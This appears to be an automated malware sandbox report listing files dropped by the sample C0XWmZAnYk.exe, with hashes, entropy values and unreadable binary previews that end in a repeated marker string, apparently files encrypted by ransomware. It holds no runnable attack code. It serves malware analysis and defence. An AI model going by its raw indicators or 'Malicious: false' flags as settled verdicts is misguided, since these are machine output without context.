              Preview:<?xml._m.....I4>$J..v..J......./.0z.gC...gMJ_...m........G*..O..o.+h.t.).....d>&[......l...v..M.E,\.E...=rM..y..V....<|.[...N......xH..=E..V.s.....(/K.....I d..7.....R....EX....s.,..F.3.5.....t ..Lp.......H.{..v.r..8T'..!5...Qv/^.X...9..0^..1l.f....P5........x....Gl..M..r...W....~...7.+h..K\..%...E.;f..v2...2...u,.jc....d..mY....cc.......q..d....7...z..l<.z....#`........@_..R.w.....Q-o.....d.oY.j.:..K...:..!._K.v..."|..D.....wl...r...D....]...J....j80...w;..q.VS....v....p.)....e.x..Z`.=...RU..H../;.;.;>7...3.C.g....tv$T.v.1c..o..r....#!...[h5.}...h..5D.X.~r...x,.s.h.Q.Zu..AU.5g)...BJ-.G..g-c...U......*.......!.Cc@l...~){.l....S....1...g.....).F....z.z....i.B.pM..e(.|.|..4..l.....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.732385267577012
              Encrypted:false
              SSDEEP:12:Np869iLwjvcMF56ek5MFCYCU0fQ65qdmL5NNtUOn20dxa3cii9a:Lf9I/mUz+FCYV0fQDY5NNn20d+bD
              MD5:F3A1D5B636ABA2D9B8F7304D13EE3364
              SHA1:93BD03AED31E7655D9FF57EC847360E7DAB3BD60
              SHA-256:287D4248CE6975B14069A06556853FE48D6C56320479B145DA085EDE049AD0D9
              SHA-512:A46A15E1C534D251F8F4CB6FFC83801FF5540A5EC16E98146991617BAED6AB9140938E6866561A65623E3E1BB0019D7D7B927714CA45309AC6CAA48D3D2946CD
              Malicious:false
              Preview:<?xmlx...d..`....^ .v...'....6uW.`.4.Z..!..V.M..Y....DHNi.c.$.....k....$....:.j...........E.DRivo...O..A....^,.P.(....$.x..M8..%.K.....d).-S..^aY0....w.1..jo8..\.Wv...k,..../z......7.-VF6&d. ..Z...TA.>..j.....U......>.QmCgM$yG.6..S.6..z5..h.f...N.q......b!1}.XXq..y....D.....w.CC...eY....(.U..4.V....T...m.....M...#....)...@...s..k..m......N.t..F....^.....\e..ZHN...ue......V.m......../...eY.~..Q.^&"...N.....O.E....#t8.{.-.......x.v...,.......3.a.~8XU..q...C..5w....,..p...Nw.F.8....D.}.@..........~:Y.NP.P.A...MP....){..Rd}..;...s...6;...M/)t.D.T-.....<..Hi...2k...........?.OY.....:Ef..p...A.E.....W..d..a./.|...Iu*1.@.@.c.NV.....)...O.@$.65........?U.N..{X;K..s<..&5....Y;.F.=...x.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.713667398573313
              Encrypted:false
              SSDEEP:12:OU9lslLQT1hvdCrBmeUOBaLg3l+TStuPZxaKX0LiQns7BZ4PFPjvqnJD05bdxa3X:T0l82rBLUng3lZYhpZ7wrvqnJCbd+bD
              MD5:E21A517C288D8D3AAED9358CC2A65079
              SHA1:D214C5F4F815DD62373ADBE6FAB15E12841D981A
              SHA-256:DFE05BBD3D8DDFBCEC7B6C77484D14866838E918F6FD21F4667AB795B79677AB
              SHA-512:EE9B9AFE3E30BD8121DA1F5EC7BDFB3810287B74843C4381CD80A6DA4F99D0090BB8DF748BAE7BFDF697DB06E763F32B3777CD2EFD53FEB974FAD3767556D943
              Malicious:false
              Preview:<?xml.^..k0.....W.......w1.B.O.........9..P.D. /..z.Bm..5D..,...N.:....Z..f..C.........MV....-.f.t|......._...8.~..(.jG......A.*o....%..Q....F..n33.rp"6X.........~c..".v>..?{.k%..ye.bzKOK...W.d.(jc....<.L....V.....u......M..._.e....S.......P~$.~.........k..`.G...Q..{.^..t.%.....g.o)9...;U..!.>..7 .>...Y...ic.'m..=_.....Xp.a,.....u...&t.....{,.%.j...../..Bl.?.....J..p.F.e...tE.....I..mq.G..T.z.]i.UWa..b..ik...Gp]....o.F=.....Ob..rt.:...T.pd`.t.1.~. ..4.XLU..e.e.J...C"...b..5.F.F~..m....x..I..~q..J.B{....g..l.........b..4.y.....M.R.}.....U.`..:m*.\. ..}_jKr...Z+5....I#i.b...m{...N...D..L.......g.<~c.#7B..O.RR..a.1..V1...J.&Qo..b."...t.Kp.%.I{L..2.7.(..>...U...k.....2...-.H...2.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1029
              Entropy (8bit):7.803302180173766
              Encrypted:false
              SSDEEP:24:zOQvat9+SYef8z/tzcU1NilaLajlEU1tW7Gvfd+bD:zOGBRe0SaLajlvDW7Gt8D
              MD5:3F2566AD99A059F0FB8B0586B1E4B7E2
              SHA1:276A69ABC9DC139823AF7ACDDD3A7540A3EDC779
              SHA-256:F7F7851A63E428EFFDB48DAC3A0606F244AF43068B73BD49DF0C59FB38990D22
              SHA-512:5B693984C01824744D9716BE3150E72D928958BBB0FA14AFB555C824F9F1D60F15C460E938834AB6627BE939A713AF1F18AA4B231F088A300203C54BF37AA2B3
              Malicious:false
              Preview:<?xml.yI`.1_zf.g..B2..K.a.G*1...W....(P|.EW4f:..,z.N..U.@....1...m.i.L$.o...Z@...w..........r*.+3s.W...L.8..l[.uyc.=1Os.~.B........4VNK[\.."&...-.. o.......C.i.s....i......\.c.xT.1...C..BbJ"J.......4]zB.9T`dBb6.S..5..a....?.({.8........._ ....x..3|...U.R.)w.....,.W.&..:..O.Z.'..U.v$o..J.]...,k.+....S2x.WX...%_.X\$9..GApu...5.......rn.7.QE..n..|.x.J'._....Y.-..#.d."W-JJ..w8iH....R.gDY.y..d.50U...Q..#.y.......^`.B.a..6..G&.".e):...<.......$.-..O.I3...G...=Y~.o|..U.z.v..p.u...!..F.).....Mb...&.J....H`j..@.v....Q.I._...g...Q=..v.A.#.#".v..f.Mw3.}..i. ..}.~e...Vla6.`zo....}....J..F....P%r.n.)V!...f...-....&..8.`..?@.+Q..8i..xs(..t..a.A..6M^...X..7.m.|{..z.....4..L...C..d.\.D....?.....>..2.FF..#.x.:.;...J...M......e......e.vjH...XQ3..-.h.iY.kM.....?+..!....u..7d..A.6.]qA.........^...5Lgb:..a....sg'...Q.n...#."ql.*..#....>.R..YP.Z....C....tV........M.|.....}..@..u.1...5.<.#C5h;..y\<..D..+c..{..@.q'...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):871
              Entropy (8bit):7.744553797541142
              Encrypted:false
              SSDEEP:12:mufUjhR8txu8pfniQoBRfz1xz8IIqQaDhswLaH3SqJgZdq0iXVvs1Kdxa3cii9a:mu88txuefnhophPQ+s2BqYCJMKd+bD
              MD5:1501A3E80AFC336299698367A7114262
              SHA1:CF6E1239D894415068A2D619CFA0E8510BAA3DB5
              SHA-256:6C5F87CBDE82BBA5EEE94B67C34E22F13F6F39CC887145ADB4AD49267FF5AF1F
              SHA-512:77575474E67EF75B1B39DE5AD52191A0FDE6941391595CF5B1DCF102E423A7E4FB22F6A2F7CA2289B04AECF90702D08E8596A26BC319A05A620D127B727C6954
              Malicious:false
              Preview:<?xml.......Z.....(e....brk.V2...L....x.W.r8.u.[.4..y.H2.Ie..!..... [.c....o...9.X.....O........+..$).r...Y.....T#...e.5......r.w......h1.._.I.k.x#...=.)...?.li.+.Z>.T.i-yQeH.~Qwp...@.'...&..H..Ocg.7H..bX.S.f9.....~G...'.O.8...0M.#.g)#...LCX.....]..+....i....(.&r.......v......?`jG1.KT..U.+}v...c..k..uR...b/....i.K.oh..~."z....Z.u.xR.B.&.@...._...!.......v.\...i.A.Xs.........i.........7T.....4.f.l6.E....u.L.6...t.j....J...m..t.F..-.)..r.0q..=.....D......H&...x....qm....9...D4:{..{be^a.X...X..f...|...hb....?5.Q....S.K......6.6......eH.Nu~9...B.._E......-.0E.7...,..AOk....A...y.V..{%.A2.cB._q.|....=...t.}.9......].g._...n.i.y@R...4[..Y...5..r..2>.t..[...].\...K9b.....7.z...v..#\.k.8oO...^.R....Yh......G../...D...6#.aW".....Ow)..N.:.R.\.-KugigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2217
              Entropy (8bit):7.906941442275208
              Encrypted:false
              SSDEEP:48:KPDQQF8m6ke+HMQgrRZczSZb/zniRWKl5d2ebtbU8kU1sOHygs8D:cUskcSZbbniF5IebtbtT
              MD5:F198BB8BA7DFD2E757B23091AACC4966
              SHA1:884894807B5F6F0701D93050482FCFEED2A0932D
              SHA-256:88EEE7F8035D7E22842E42DFD95759D1E987C1AE67DA09E1D46471A8288FDDA7
              SHA-512:90EE812AC2580C80611728D851D482A7E8B9E7C45DE3568A42670282C96E4964286E7399E75BE0F10F469C6683D648671E2A742DEB7EDA2FFDC07C60E05DD075
              Malicious:false
              Preview:<?xml..J.Xss..6X7..e.,omc&.U...;r.`....'..c.CM"o..g_...*..i.7.~}k...z.>#..4......._.4.......Y.`Wv........R'Q........c..H...%.........."...4Q...|..d.L.2:.4..7.f........<3.U.l\)3.G.........7..o......B _...........p..i..^......7.:..*...5.t^..F......[.ZH..s`..l2.29.Z.N|.K.........v..io.n.5.K.[t5....Q.9.....bo..x}....0...b..V.Mo...N.;.................h.f..........2c..+k.....5..mC.j./..y.%C..3mxM.(*..I..G....s..lq..W...c.3yY....J.5@..8n.X..s.s.yk..s.?..+K.+#.m.&.*.....j*.K..0.........=.............h....|...&.L.../...a.e(.-s..."....._.<.?...aK.v.f.=..YngJ........2.."6a..D..*...r...Yy@).....?.]...h.7..........r..k.!..U.?.B.B....i).....N.....y\....C.V.hG,v....mN.q.....a..}.....:..ava..R..=\..m4T..[..]u.....&.....>E.q./..N.XY.........K..8....|..nxXw...$...q................@..._..o;GA5N..i!p.Y5...N .^.l.e'B.B.......T....(.....G...G.n..D............!..a..<....&vl..%W..K>z..pL~.!..z......`...).P....n.v.../r.J0......6W.....+...L.K.V.c.H.Gc<..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1987
              Entropy (8bit):7.906764261066095
              Encrypted:false
              SSDEEP:48:2YnMC2J+ZTytXo7Jm1wGd3xpm3/yXY0HMdmAPO8D:2azTylCcrd3eP6YJd3
              MD5:148A907E440FA24C352E752E8A8B27D4
              SHA1:372CC442200E7EBB5E6D8F329B076AD497AC9034
              SHA-256:36C8752F99E7C63CCA36E897079FB7892BA5FCBA98EDA34F0FA851237D998EAF
              SHA-512:8EB8E1055EFF5D478C1A1515E2A9A4AF4A2CFB876196BE0BD0DBA5D385DF14FFF49B14305AD8DDE323E410A0E8EBF990D1C0A8A9F93D3A87920A5728A4E29000
              Malicious:false
              Preview:<?xmlR.LL|.9.a...X..!-.ZB0...d}".....#...>.W.$......f...7.H.....3..............b......P.|.KQ....1L.Je..M...z.x..(._m.r.f4..^....2....&p....3.J_q.*.z=.U.v.gg.HO...f.~U..EN~..0V.....9.E_...w#m..0r\..3|)L{w.C.....*y".Z..4;.v)X.o......7.~.K..s..|..9...a#8./..=..N=.h.?..H..._.2....1.tD.&.w"........<y..[Ild.......nW.?.>.R..Cw._...(....e...<...d.....lLtS.....a.i6&:...:[....-.....\.........6K.F.*o...P..z.P<R<g...9J.%[../5....JI.5Ov@.m.V.I.m.8.T..wnZShV2.}.f....f.p..(.i./}*&.B....>...K.H..L...)...v.O`....1[......n.d..-v..R.N....42..tW...O...t...0.O.>.0........ec:m.&..D.M![.%...PN..a....s..(z..$.g..-=F.......@...&.5..).q..7<.h.uT.....K..< b....|b...[..fM....nc..+&.v\p...X..:.1?m......}a...gv..=.......(....X`.?...P ..x.;.=.6/]z.....<..wbj.......<cF.S.:.$....n.......1.{1.....T...!.....?......}....C..$..)..W.t.....?6....]..Z......5B.#......\.......-....,.....w...+}.8.|....K0...?..u,Y.q.....X5c....K.a.d$X..zM*.?...8.N...(.0.-.1F..!.~]q.m.l^...5....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3851
              Entropy (8bit):7.949993475376966
              Encrypted:false
              SSDEEP:96:RvSuedSia0ZfLqk5iRRRu8DlPL1BCk4iJ3Q0QeY:Rpe0iaafLqa8RDBXCd43QwY
              MD5:6478943813D547D67EC70BE9BC7F14D2
              SHA1:0FF38B26E0C00D01C48753906CA51AF628671716
              SHA-256:278415806426111A42C53483D576AEBDF8431752DFFA49078ACBA67FDC47F389
              SHA-512:D0176489EE20E79FDF85B8D377319D76D6ABEB5661B5576860AA6852E3F5D859741D2353E8069041704D8A939C03EF532708C8488C652DA4EE75BCBC5EFBE32B
              Malicious:false
              Preview:<?xml..d#=.Ps^.u.S^..G.-...3./...y.....G.#@..W.WH....Q.B-.&.@..nM..r..o.........}...{...c..IF.<...B..GG.......s...G#.0....|R..9+,.WA.[..6q.Q... .....y..{......-sK..%...y.-.t.K.~.RU..N^..a.E.f?..SQ__6...T...H..?....(...Vn.O....m.f....V..m.rB.6o-..s.v...:L...\..[......L....]<*y....b..E.s....X..@...n.h-.....a.?..5..W..,O.N...PP\...G%k)...h.d.....j.......3..|..Vo..I....QS........P..J)...!:.Q;.u.T.B.n.........Gohy.M.{{...**U.M;.3n..p...gB....N..w.....D.....{.!.k*...f6....4...1<...pWg.ihY<.D.v..]......~[.fM...Z.|.a...%Y..;....._WK0L....>.1.R.*..0.3C.9.Z;^L"v...O..]...y.....`.n.Km.._... p..h.0C}...^.x.d...*.......&..h..2;7...7.......AbkW....:'J..3[........M.K.r.....eu./?{x.l.X.z"P....mI.Rt...%GG3..f.....-.Y....2cH.O.....:..(..2...{.z..=.n.%2N..}...G.91.......N..)xD.l..L)G.k..|...4....`..TDT.Q..ZY..bKap..V..r.>.k\h..t.[B0m...!..h.>...a.XV.D...%8_...o....*cV...(..d....$...5......j-..T. =v.;.r=..@.x8!....x..p.7..=...y.5.6$....E.$..^+....u.._U...B..}....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3223
              Entropy (8bit):7.948524885079705
              Encrypted:false
              SSDEEP:96:YxqeTiKV6Ivjh0kqbGaTqob3XrAU96FuO7UK:YxfTiYjhnabfj6FIK
              MD5:A79B1B2C985FA1C8986A6F113AC3BEC8
              SHA1:E98B06EC7B521F5FF347FD0A67D27CF1158FB65D
              SHA-256:EF46A1A56D36395E31F6EE9DE322AAF0B9B82C8F09F6DF102A0A7CC3655CF97A
              SHA-512:DAC1C0000B14D7730EC1954C44BFFAD27FADDABA39F20AE01F7F8444F7A6E6179C6211A2E8034E980100D67BAFE3D8AE8C8690287DA5F3BB4C111615EA5D44CC
              Malicious:false
              Preview:<?xmla0\..&.|lc....u...'....C~...^ o.}..._.1.4..;...a.....>..8....\.t.?[......~.~...{........K.SE.......hs.6.....p..U..3+H<.GQgo.O....{..be.wfD.M..5..f...K.`w..?..G...s.Qh...cH....1..N.|..6K....9.e.x.1..P1;....O.....#........L|~.H.6.%.x..X.,....!.E.k.2=Q.#N.al...OF../2.1.........k..|...[..1..myc..=A.+..p ...5...g.........5~M...5].U:..p...rpRVQ.p.....Y._}.6......M...(...qM..Q.h\S.`.%."...;#+x..H.H<B...z@0n..r.J]R[y.S.....<..Q.'...rr..Sh..].IH.....4~.....CM..a...B......(. H...q..)...qn!.j.U..#..6.'.....b.IWbZP........Wl..y.B.....qs.AD./..;~.<......._...\..C.......(......f.....-.QG.1....5_....h....k,.}R .EwU.T...N. .........26Vt....3./6..3.@./....!.....U 6..DH.m.N0.....3.S=P.O.sz. .S.....r2..'..[M.7!vX...{~..L`.y.[...8$..d*..}vv.......{].=8.....K1..*...?..4....4.;./.a...&.......~....-. M4...~=X7..27.TS8D-O/....$~2..q+z.. .`k....]0...3lw...?...j...Yp3..n63..c_P....s...t>PI& .....7......bqL..>......).,.&1T.!.....I.V..'*.Y1BKZ...B.2..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1586
              Entropy (8bit):7.8700175866609365
              Encrypted:false
              SSDEEP:24:Xbm9JM7dsomkui0KpGYEwKUFUcp/Tcb1Vow7GzcCmQagpSHTSClfSlAd+bD:t7Z6MGYZKUFn/Yb1Gw7Gra4SHTrg28D
              MD5:FAEC054A22CBAD7E706C03208E15B053
              SHA1:000C0C5CE4D311939848F599AB3D1C2FAC1C3BDE
              SHA-256:3FD7F4771716A1E08976D7C2A4C294C8B5C55E844D5B4C80B420281866F3FB82
              SHA-512:D158EE22C6A559559E1672B72EF0A84B26C72FBBA553866BC41D7138A2D9AFB1FD54B8515284F3556CB24803A180283121D96590774BE10C054087532AF8E0DF
              Malicious:false
              Preview:<?xml...Y.......p..~3.1......<....N.....?..=.K.....sj...R......hz.5I".....?<..0..i......eU...........<..Q..1......E..S......)..[..+.1$..VHT.N..m..B.W^.K....?.}...*.."..2.`V.4.,..Znb;.5Bp.R.W......F...U....S'..#..{..M.U-..0F..y.%..WF..?...sz*j..yEJ.cm.,W]%.....D..x....J$.G".h6..e.PE..Rq.Y........B..`d..2.Y.&/....):4r.....#Ot...m.....7.G...E.I.{.Q~..H.OS.9.v....Cj...(.....Z4....b ..m.S.<....^!/8....../Tx..Fj..H..p.6k...w...i.i....H.1\.,..n..B/.cnSm.0.g.8Mt,>.:f..].[....;..0..0...........1.I..aA...5....C......\.......I8F..9L..Ds6pT... 7.pN..7...T.]...Y....|<2.V7.;...P.....6...r...U.....Zs:....j.........,.5...1}..V..|.].p.u..... w.8.H..7R].-.eR.q.B.m..+....0.....eA...U....w;Q.........aQD.Z...#....P..g.LYj.|..U.....9...5%.G..%g......5O_.p....p..jp.S'../.....o..F.....*.0..<'..x.^.5.W....=..G.s..c.B.g3.].'0..../G.m.)= ..X..}.h..n<.8...l....e.>.=}{%0m....a...7............`._....p.*..2D6..d..cZFwfk.w...Sa...R.F....%.&}..:+.i}HG..R.............u.....v.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1572
              Entropy (8bit):7.883571282490523
              Encrypted:false
              SSDEEP:24:m5e+z+A44bRxNUWtpc4/9e1vVEq1n2zsYfpiy37orqMjuY2axvjtXvepP7LfVorb:m5RRVxNtZ/9c1wp93yrf2Mj0NVoe8D
              MD5:2DBFF3570FF3E7008B3B4ED443E6CC6E
              SHA1:8F7F0A63BA34DEFCB144D730FEF342DD16A8A643
              SHA-256:069FE9B64346FA4257CA2AEECF28C499F9D58A359952C772D3AA01D03A344304
              SHA-512:857C1F374E067C42EA61A018814C432E4B9EBB77A422D10CC8ABE18B8A7184B2EB19F1C4F4AD78480313621252C3415A1F847B05B3232E0D7263CF8F98DA08C0
              Malicious:false
              Preview:<?xml.'.......%...|......^.Z.A......EHVd........VM!*..IT.rr...?.#iW.........0f.6b.f....mM.....O.'.B..q.d.l...v..k.|..JY...5[.C.......@4H...p.$......9....vE.ecH.J.........xU6.NM..l...z...Q....rh....=.r.....C.F.QW._..s...ss..d.z8...v0...~ .8....%&.,.....`....:".i).^R.U...j.q.b!.x'V.@....a.f....X...v..U..h......,..UL.%/6.).|.....p......$._.d...R,lKR..._"...)...I#F...L .....kM..Y:w.....!.\. .f.qG..5...(P....M....#p%..[....=.M7...9...v@.B]....../......5r...:.. *..l.Y.._.Uw.....v(RI.Q..1...K..Cj.....K)...`H.G)....d.5@...R..}.!.l...X.)J..n..B.pM...:.$.d...N....k.....Y......T..L..v..X..C@..5.a7s.-pW...........%.G*..\eh.....%y...^.f.).qOQ~.L.G...5z..:;.bK.}Xz.I./.......c.m..T.-I..v..g.\0.X.Z.7.........E.....+./7.o.\V.....|A.>quI.."0..3...."..d.....d....[..k.y.].8..M..1.O..\.].YQjt.+mr6.B.p&P.Y.....hnEx.3%v....C....}...K..Ee2...#...2k](..m....V.......B.9y...U=.E...(.........e.V.0O2l.2Z.>"...._.....\}...$..(.]..vc.#4...\,.V.Ex..+.(..1..V......%.~
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1978
              Entropy (8bit):7.904459545089906
              Encrypted:false
              SSDEEP:48:2OOR1jKrJAfUtUep/deYMr+wIIzD/Kc+eIcbCNcQrN5zL4QklRaWlYa8D:2OQ1WORepgYwLIOTKFe+cuUlC
              MD5:E8954B377191B071486B82CE46402FB6
              SHA1:91CDF7FA02F034C102978FB632FA970C38676D55
              SHA-256:9F5D4773CBDF28E6CE94D23A7CA7CA28BDB7B830904A44FFF6C4ED90A8CC316A
              SHA-512:9E16FEDA0BEA7ED06112FE611C909ACB5CBD03659663FA81C8A8EFC3A51A784D9A930A44BE41D9CBFE9494373B82E4068CDF003EA081B17B3C5C65AEA008613C
              Malicious:false
              Preview:<?xml....vc.O..4......W.RnK.4..Q.%._....CY&G.eK.HaY...k..X....uoP..,.Z.-=..Q.s..L4.4M?....SS..O.H.][...iN...cd.I...f.^;%...k...a=......'u...a....j,.....a...:.`..|.0......w.!...Q..7.}!..i.K?.j>(&...v?..L.V@.6s..._....g.......1t$x6^*.>......'..%w..........g......q..}...1.i....^..jj...Vw.>..K...\..9...Su.~._...16......u.@?%rh...y*P..E'M.~..@.l..[f.L.&v.M.}.w.c..q.kj.9..4.o..*+....x...6$vA...7..$.w.;{%U8.=...6....#_....%.f.)..q....f..XL.1.......S.........2..fH.....Sm..c.G\X.....\^2....HI..058.$.......d55v}.....q/.*.c.w...c'q../n.*.I.P...Hey.7.z... ..X.....2..'6../!..|.0\KJ]...&.....b=V.lf.5......d...P..z...r.U..R.....iM.......U*.......^....3'V....O.s....Z....I..U(...I.........F.=...."...$U2;/M#2]._.HO...H.Gu..?...Q......cK.f.<E*...y..5....'..8..........T.D...J<q`C........Tn..S(...tu).y...ob$R.@.j...M.g\...J..T2..6o+.N.9Q..7..d..lHR.....*....E....&..^..........m.^..%;.KL..q.C.d.,1...6>......i#...[Y.W...!.z.ro@.....*...2..c5..,...LU
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1658
              Entropy (8bit):7.8895092412619485
              Encrypted:false
              SSDEEP:48:Pm07G5O7DH/g/EA7/XOQf9YOBX/HNq48D:PvKaDH/GEIPff9Y4e
              MD5:28CBFF1B3F1F5745E4AF6722BE72BDF4
              SHA1:6384F83679BA7570C389E7C6B612A3EB03DE29A4
              SHA-256:E334F4461977CBA8E5DC1ABF639DCAED80FD9BB97D3CEC0DA4B7BB39AC2951E3
              SHA-512:473B3E8CCC02D5556E223E516CD11932CAEDD0BB4717A8F11758A5A260CA1538A0258CA4E9B5F79E57B04A60C27E8B1BDBF68E6D97467BED1A2375BF358F6311
              Malicious:false
              Preview:<?xml.1...@.-.....2...+.i~E.....d.z[.F"..}.7H...jJ....55......c...PS..{Mi.y`V..c.b.*.. _.Y.30&8e.7n.........!...<.~..=...uV(...7.h;Y..awA.h*Y.O..tad...>..u`..`.F....b..Jc..[O.....P9...$H........+S..:.'.......D.....0[.p.u;K.7.x...q....>..^..B ...nFG...%!..8.}...s......Q..X%j.rA..,.j....Q...\.(.y...f?..p.E..#.o .N....k?....+.O..g(.6.B.U......y;..-..nR..w...PU..ny....q&.6..T....=(.Vv=.$...2M....F.2..y...........D.3.r..f../wewC.\E...":..\*:g..1.!....gu.>.-...Z-..4.MM..%ss.*H(... ..lGI..%!d,...Jd.*d...|.1.sN.k!X.~...A {.9..+... VU....K9:c....7..N......]8.R......._.r."XUc..vA.2L...Z...8...:SI.&..#....$..QX/..D.{.....Q..af.1...-..^.I.5........#..>[.o.#...b.....("q.nv.........4.....>..m....y....<.Am.n........r.....Qd.u.....O.s..)...v.....1.z9..es...=......r..`.q. ^."..h2.f.v\.6.j.............z.........l...-...cd...ec....y.WJ4.......n.P....}....._...|fH.r].xc...`P...7"...:5[I....b'.).#...]$|G..,....-.!Xb}....p.EN..#...G.Z".....}y2E./D.....g.../
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1698
              Entropy (8bit):7.901765713302146
              Encrypted:false
              SSDEEP:48:3CCpagzJex8Mar4cmljXUa2CaEJ63Owto5k8D:5ag8WMa+lXUatamKUn
              MD5:D1870FF91EED88A73300B986D5ECFEBB
              SHA1:6F2A29B7EF97CEB2697A7188BAB5CE045399B011
              SHA-256:55B78D6C26D075251C786CCDA90A10F2FF10B1505EC202AD4A610C5D91E8C486
              SHA-512:B9264658F049A68D98638D9A7245CB160B8C7D3D68075EBDA42C13917E219DB8556D19F56B33846173176E6586E8761E85B77D002978A114C542EAA3C014CB0E
              Malicious:false
              Preview:<?xml*.lO.....Kuc....h!..W..1.v.........S.v....lP.1p.j..}..{.Y....~.....w<.]m".p.z..Y.....NF.........l.&...W.V.w....j..N.].\"7.+... .......G.8....W...........#K.p.Ti..._..<...............T..y.._!(f.....Ug.y..A...?.Nb..A.pw..o.x}.<./DO..2(.-.Tc.....V".;.G.T0......].b.........<...t..t6V.qx..iav..)..&...0X.yJ.\Z._.~8t..{../.......hN..#..;..FD..#_.#...`.#......Q..N..$....r.......G.E.i.V..u......1. ..|uA<.F!........:.[........Y\qL.....>S!.\g.....I.......^.K.h./..2~..l...x. z..N.V.....?...r.....A..u..o3...Rk..2.O........3..%..u.}..4$...2..-.q}..Uv.......^.8..O8.:.d...#...:z9p.$Kx.)m.Di.8L.....Q...m>m..5(...[+.b.....)yrx...G....N=...P.}.%|U..*..{...p.Z.!..L.].Y...`....t......).d.?.......l..aD......?....F\...../...s...M..Q.7e.vDO..#.!....o&.n._w.6..o.3..._..........lX...(......h.....#...9..>7pG..g_....q2.....z..n.T5~\pzT.w..`..k<q.....H.l..c.8..(.#...Q.T../....,..^eK.k.....@.....v.. ")..9/....3..q..O.E..e.+.i......=q.......d,(_...s.:....f....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1715
              Entropy (8bit):7.888575023308775
              Encrypted:false
              SSDEEP:48:KsJ1SvN25Byfo9JisLgxsWFThuZNifaStniQzwr00Q8D:Kw8vsSw9UtxsWdsunzwr0M
              MD5:8DB99DAAEB40066A2A7EDB8B402B24D9
              SHA1:ACC557D2346A56246ADB97ACFC0528EF218ABCC3
              SHA-256:2222D9E0CAC277C5B648C6763F8F7071AE4761E13B7B7B38065C29FA3E7243D0
              SHA-512:933B5DBA97A990787614F97704A45B7DCDE46EDD98C2958AB57814EFB9C94770468F2AA9FC5B4BA636CC53F839849D73A81024C870D4EB28DC052D7B6E087E2C
              Malicious:false
              Preview:<?xml4n<.t..1...N8o3S.4vv.......{].0..C1...!W.."..../....'.T.!3.6b.. F6.D..... ..v..Y3,_..j..Y.$4S...+]v.#C...a...Q.g...4...j...P....`:.E..\x.6X.&G.c...w.Z.4.....6....wZ...z|.{~x..].H...k.lB...W.NWj|.F....r.U@]c.........e.N...8%......:.-m.h6p..k.*..\....b...I.k>.e.......$..Fs=.^JMp.... \T....c../..7.@...e......3.%..|?..@.}..q..V.....D.........s;W.../.....j.]...y.L...".-]"..q_...G;V9.+o..G.....7.....I........h(..l2.5.K....`%h............(.d.C96..k.}...N/.(.Og....`.j{.V....f2..M...Iz.t......f|.......W...|Z>.*W..z...*....<1`.!.&Z\OF.29.d........v.@.*J.Qe!........./.K..YX...5!.:$d..4...7..:..U...@..P.+.Nd.......+...i:..&...~...s.96.}|....S..a+f.......V...pS)......#9.%.l.&P.k>/3..a.lg.Z...<~...2.a....h)u;a.B."...s.,....9u..O.W../GO.h.2....B..*.EW;S....yX....../.Y...{.....Wp.[a:>...d.p...Jl.....t..Z........9.%.tp.K.=..d._.N..{m.!...!`.....2./..!...."......M.....(....t.y0..+lK..$.%.\.B..@..%.c......g..!.g.>.....1!].c{..6.i..[<..=.n..G.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2858
              Entropy (8bit):7.937564438403034
              Encrypted:false
              SSDEEP:48:EPAQx7hJXy+pFLKW3JukOnQZOcKeF7sDiVA6iEJP6cJ1ppYuBv5pbb/F+ZZ4yt8D:EPAcIiFLKgJJTKugeVAf8V1pzBv5p3/j
              MD5:C33B57FF9A4D0DB818BAD644AEABBBD9
              SHA1:3E238FAB835A3310C89AF4D1502964D14A0062F0
              SHA-256:5124FC96750544796D16D55754531DFEB62B58EEBD155105E36D2B38190BFCC1
              SHA-512:7F5F0919106D1D2EC56A9F7982B1B0078BAFF2E410210A8AD92B6DA683A45D38FCA01A59DA6083D845F90C6851D017527AE4824B2EDB8DE4573FEB8E4AF2110C
              Malicious:false
